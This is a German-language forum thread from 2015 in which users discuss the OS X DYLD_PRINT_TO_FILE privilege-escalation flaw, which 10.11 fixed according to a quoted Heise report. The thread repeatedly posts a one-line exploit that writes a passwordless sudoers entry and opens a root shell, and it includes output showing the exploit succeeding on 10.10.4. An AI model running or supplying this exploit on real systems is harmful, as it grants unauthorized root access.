OSX exploit

9000H · July 23, 2015 at 9:34 PM

Hi,

https://twitter.com/i0n1c/status/623727538234368000

CU
9000h

Moorviper · July 24, 2015 at 12:24 AM

was ist daran ein exploit?

Erstens kann der Befehl unter osx gar nicht funktionieren da die Syntax nicht stimmt weil der "Depp" keine offensichtlich Ahnung von osx hat.
Zweitens bräuchte der "Hacker" das Passwort des Benutzer wenn die Syntax korrigiert wäre.

:edit

Code

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
bash: line 1: 3: Bad file descriptor
Password:

kris · July 25, 2015 at 6:31 PM

Hi,

Moorviper
ich weiß zwar den Grund nicht warum du gleich beleidigend wirst, aber der Befehl funktioniert. Und zwar ohne Passwort.

Ab 10.10. kann somit jeder normale User Root werden.

Mit freundlichen Grüßen
Kris

vdr-box · July 25, 2015 at 6:48 PM

Der Capitain ist sicher

Code

macbookpro:Desktop USERNAME$ echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
bash: line 1: 3: Bad file descriptor
Password:

vdr-box

kris · July 25, 2015 at 6:52 PM

Hi,

vdr-box
seid wann hast DU einen Mac?

Hier noch ein paar Infos von Heise
http://www.heise.de/security/meldu…10-2760786.html

btw. habt Ihr aus dem Twitter nur kopiert? Das geht so nicht, weil nicht korrekt formatiert wird. Evtl klappt das so

Code

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Mit freundlichen Grüßen
Kris

vdr-box · July 25, 2015 at 7:00 PM

Quote from kris

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Quote from kris
Hi,

vdr-box
seid wann hast DU einen Mac?

Hier noch ein paar Infos von Heise
http://www.heise.de/security/meldu…10-2760786.html

btw. habt Ihr aus dem Twitter nur kopiert? Das geht so nicht, weil nicht korrekt formatiert wird. Evtl klappt das so
Code
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
Mit freundlichen Grüßen
Kris

Seit 2013 hab ich alles auf Mac OSX umgestellt.

Und nein, dein Befehl geht unter El Captain auch nicht.

ver-box

Moorviper · July 25, 2015 at 7:24 PM

Der befehl geht bei mir weder auf yosemite noch El Capitan
Gut vielleicht sind meine OS nur "kaputt"

es ging auf keinem meiner 6 Mac's

Moorviper · July 25, 2015 at 7:28 PM

ja
10.11 hab ich nur auf meinem zuletzt gekauftem macbook

die anderen 5 Rechner laufen mit 10.10.(3-5)

bei keinem ging es

aber es tauchen da immer mal wieder solche tolle hack's in Foren auf.
bisher ging da nie einer ...

halbfertiger · July 25, 2015 at 7:34 PM

Direkt aus Twitter unter OS X 10.10.4 und Firefox herauskopiert:

Code

Mini:~ test$ echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
bash-3.2#

"test" als neuer Standardbenutzer ohne Adminrechte eingerichtet.

gda · July 25, 2015 at 8:34 PM

Wieso ohne Adminrechte? Vielleicht hat mir ja die mallorquinische Sonne das Hirn ausgebrannt, aber ich meine da ein sudo -s zu erkennen.

Gerald

seahawk1986 · July 25, 2015 at 8:43 PM

Quote from gda

Wieso ohne Adminrechte?

Weil der User eigentlich nicht sudo nutzen dürfen soll. Der Witz ist, dass man in den betroffenen Versionen von OS X mit DYLD_PRINT_TO_FILE trotz fehlender Admin-Rechte für den User in die /etc/sudoers (oder eine andere beliebige Datei) schreiben kann und dadurch die erfolgreiche Ausführung von sudo -s möglich wird.

Hier wird das z.B. genauer erklärt: https://www.sektioneins.de/en/blog/15-07-…o_file_lpe.html

kris · July 25, 2015 at 9:35 PM

Hi,

Quote from vdr-box

Und nein, dein Befehl geht unter El Captain auch nicht.

Sagt ja auch Heise

Quote

Das Sicherheitsproblem betrifft laut Esser OS X 10.10.4 sowie die Beta von 10.10.5. In den Vorabversionen von OS X 10.11 (El Capitan) hat Apple die Lücke bereits geschlossen.

Mit freundlichen Grüßen
kris

Participate now!